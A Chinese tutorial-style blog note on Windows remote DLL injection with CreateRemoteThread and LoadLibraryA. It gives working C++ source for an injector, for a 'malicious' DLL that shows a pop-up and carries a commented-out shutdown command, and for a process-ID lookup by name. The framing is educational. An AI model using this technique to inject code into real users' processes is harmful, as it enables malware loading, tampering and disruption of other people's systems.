代码根据《windows黑客编程技术详解》来的
 
远程DLL注入:把我们的恶意DLL强制注入到正常的进程中
 
每个程序执行时都会调用kernal32.dll,加载DLL时,通过LoadLibrary函数,这个函数只有一个参数,就是DLL路径字符串
如果我们知道目标程序中的LoadLibrary函数的地址,然后把恶意DLL路径字符串强制给他,是否他就加载了我们的DLL了呢?
答案是是的
 
这个是传统简易版的,根据pid来注入
 
我们的加载程序CRT.cpp
#include <Windows.h>
#include <iostream>
#include "CRT.h"
 
BOOL CreateRemoteThreadInjectDll(DWORD dwProcessId, char *pszDllFileName);    //声明下面有这个函数
 
using namespace std;
int main() {
        if (CreateRemoteThreadInjectDll(,  "C:\\Users\\86132\\source\\repos\\CreateRemoteThread\\x64\\Release\\CreateRemoteThreadDll.dll"))                                                    //18236:目标程序进程;路径是恶意dll绝对路径
               printf("Inject Success");
        else
               printf("Inject Fail");
        system("pause");
        
}
BOOL CreateRemoteThreadInjectDll(DWORD dwProcessId, char *pszDllFileName) {
        HANDLE hProcess = NULL;            //进程句柄初始化
        DWORD dwSize = 0;                    
        LPVOID pDllAddr = NULL;            //内存中申请空间时返回的页面基址 初始化
        FARPROC pFuncProcAddr = NULL;      //kernal32.dll中LoadLibrary函数的地址 初始化  
 
        //打开注入进程,获取进程句柄
        hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
        if (NULL == hProcess) {
               MessageBoxA(NULL, "OpenProcess", "提示", MB_OK);
               return FALSE;
        }
        //在进程中申请内存
        dwSize = 1 + ::lstrlenA(pszDllFileName);        //计算路径名字长度,并且在结尾加上0
        pDllAddr = ::VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
        if (NULL == pDllAddr){
               MessageBoxA(NULL, "VirtualAllocEx", "提示", MB_OK);
               return FALSE;
        }
        //向内存中写入数据
        if (FALSE == ::WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize,  NULL)) {
               MessageBoxA(NULL, "WriteProcessMemory", "提示", MB_OK);
               return FALSE;
        }
        //获取LoadLibraryA函数地址
        pFuncProcAddr = ::GetProcAddress(::GetModuleHandleA("kernel32.dll"),  "LoadLibraryA");
        if (NULL == pFuncProcAddr) {
               MessageBoxA(NULL, "GetProcAddress", "提示", MB_OK);
               return FALSE;
        }
        //创建远线程,实现注入
        HANDLE hRemoteThread = ::CreateRemoteThread(hProcess, NULL, NULL,  (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, 0);
        if (NULL == hRemoteThread) {
               MessageBoxA(NULL, "CreateRemoteThread", "提示", MB_OK);
               return FALSE;
        }
        //关闭句柄
        ::CloseHandle(hProcess);
        return TRUE;
}
生成exe,
 
我们的恶意DLL    CreateRemoteThreadDll.cpp
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdlib.h>
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:                  //DLL被加载时,调用下面代码
        MessageBox(NULL, TEXT("远程成功"), TEXT("提示"), 0);        //弹窗
        //system("shutdown -s -t 300");                        //300s后关机
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
编译生成DLL
 
执行exe后,注入成功
 
 
过程分析如下
远程进程注入成功,却没有加载dll
1、dll路径必须是绝对路径
2、要注入的目标进程,有些权限较高,calc wechat这些我都失败了,注入的目标进程设为一个简单的,比如说你自己写的一个简单的exe
 
相对路径,虽然显示注入成功,但是DLL并没有被加载,没有弹框
 
 
很多进程都注入不成功!calc    wechat都不成功,上面注入成功的是我自己写的一个exe
SESSION 0隔离机制
 
下面是利用文件名来获取进程id
#include <Windows.h>
#include <iostream>
#include "CRT.h"
#include <stdio.h>
#include <tlhelp32.h>
#include <tchar.h>
 
 
DWORD GetProcessIdByName(TCHAR *pProcess)
{
        DWORD ProcessId = NULL;
        PROCESSENTRY32 lppe;                  //进程快照信息结构体
        lppe.dwSize = sizeof(lppe);           //进程快照大小
        HANDLE hProcessSnap = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);                //拍摄进程快照
        if (hProcessSnap == INVALID_HANDLE_VALUE)                                                  //拍摄失败返回INVALID_HANDLE_VALUE
        {
               MessageBoxA(NULL, "CreateToolhelp32Snapshot", "提示", MB_OK);
               return NULL;
        }
        BOOL bMore = ::Process32First(hProcessSnap, &lppe);                 //获取第一个进程
        while (bMore) {
               if (strcmp(lppe.szExeFile, pProcess) == 0) {                //szExeFile:进程结构体中可执行文件的名称,strcmp:比较两个字符串是否相等
                       ProcessId = lppe.th32ProcessID;                     //相等返回0;th32ProcessID:结构体中进程id
                       break;
               }
               bMore = ::Process32Next(hProcessSnap, &lppe);              //查找下一个进程
        }
        ::CloseHandle(hProcessSnap);
        return ProcessId;
}
 
 

传统远程注入线程,加载DLL的更多相关文章

  1. Windows x86 x64使用SetThreadContext注入shellcode的方式加载DLL

    一.前言 注入DLL的方式有很多,在R3就有远程线程CreateRemoteThread.SetWindowsHookEx.QueueUserApc.SetThreadContext 在R0可以使用a ...

  2. 动态加载dll的实现+远线程注入

    1.在目标进程中申请内存 2.向目标进程内存中写入shellcode(没有特征,编码比较麻烦) 3.创建远线程执行shellcode 之前可以看到shellcode很难编写还要去依赖库,去字符串区等等 ...

  3. 无法加载 DLL“SQLite.Interop.dll”: 找不到指定的模块。 (异常来自 HRESULT:0x8007007E)

    SQLite部署-无法加载 DLL“SQLite.Interop.dll”: 找不到指定的模块 近期刚使用SQLite,主要引用的是System.Data.SQLite.dll这个dll,在部署到测试 ...

  4. 加载dll过程中assembly失败

    错误现象: 进行插件读取时出现错误:“尝试从一个网络位置加载程序集,在早期版本的 .NET Framework 中,这会导致对该程序集进行沙盒处理.此发行版的 .NET Framework 默认情况下 ...

  5. SQLite部署-无法加载 DLL“SQLite.Interop.dll”: 找不到指定的模块

    近期刚使用SQLite,主要引用的是System.Data.SQLite.dll这个dll,在部署到测试环境时报无法加载 DLL“SQLite.Interop.dll”: 找不到指定的模块. (异常来 ...

  6. C++动态加载DLL调用方法

    一.构建DLL路径 char szTmp[_MAX_PATH]; char* szPath = getcwd(szTmp, _MAX_PATH);//获取当前工作目录  //构建dll路径  strc ...

  7. c# 无法加载 DLL xxxxxxxx找不到指定的模块。 (异常来自HRESULT:0x8007007E)。的一个解决方法

    最近在做一个程序,想把某些功能用C++写成DLL供C#调用.但是无法如何都无法调用,提示"无法加载 DLL xxxxxxxx找不到指定的模块. (异常来自HRESULT:0x8007007E ...

  8. C#加载dll 创建类对象

    //加载dll 创建类对象string sqlightAssembly = Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "syst ...

  9. 关于Windows平台下应用程序加载DLL模块的问题.

    本文将讨论以下问题: (1)Windows可执行程序会从哪些目录下加载DLL. (2)如何将可执行使用的DLL放置到统一的目录下,而不是与EXE同一目录. (3)可执行程序加载了不该加载的DLL. ( ...

随机推荐

  1. hdu 2225 The nearest fraction (数学题)

    Problem - 2225 一道简单数学题,要求求出一个分母不超过m的最接近sqrt(n)的分数. 做法就是暴力枚举,注意中间过程不能用浮点数比较,误差要求比较高. 代码如下: #include & ...

  2. a span做成按钮时,文字不被选中样式

    HTML: <a class="button"></a> <span class="button"></span> ...

  3. Python type hints 之 Optional,Union

    1,前言 type hint 在pep484加入,我个人觉得这种类似于类型约束的(机制)有点违背了python简单.简洁的初衷,在慢慢向c# java 这种强类型语言看齐的节奏. 不过好在不强制使用, ...

  4. C# TransactionScope 事务类

    微软自带的TransactionScope(.Net Framework 2之后)是个好东东,提供的功能也很强大. 首先说说TransactionScope是什么,并能为我们做什么事情.其实看Tran ...

  5. BiLSTM-CRF学习笔记(原理和理解) 维特比

    BiLSTM-CRF 被提出用于NER或者词性标注,效果比单纯的CRF或者lstm或者bilstm效果都要好. 根据pytorch官方指南(https://pytorch.org/tutorials/ ...

  6. 2018-6-11-WPF-Frame-的-DataContext-不能被-Page-继承

    title author date CreateTime categories WPF Frame 的 DataContext 不能被 Page 继承 lindexi 2018-06-11 10:48 ...

  7. 你以为SSL是安全的吗?

    在现代的IT安全领域,很大程度上依赖SSL来保障通讯安全.但SSL是安全的吗? 在2005年,王小云证明SHA-1能在较短的时间内找到碰撞.王小云发现SHA-1的安全弱点是偶然还是必然? 就我所知,各 ...

  8. Python--day62--Django安装,配置,web请求流程,views.py总结

    1,安装Django 2,创建Django项目: 3,配置Django项目 1.settinngs.py文件 1.templates文件夹的位置 2.静态文件 1,STATIC_URL   ----- ...

  9. [转]【Linux】Linux 目录结构

    初学Linux,首先需要弄清Linux 标准目录结构 / root --- 启动Linux时使用的一些核心文件.如操作系统内核.引导程序Grub等. home --- 存储普通用户的个人文件 ftp ...

  10. java 布局管理器

    容器中的组件的排放方式,就是布局. 常见的布局管理器: FlowLayout(流式布局管理器)//目前最常用的 从左到右的顺序排列. Panel默认的布局管理器. BorderLayout(边界布局管 ...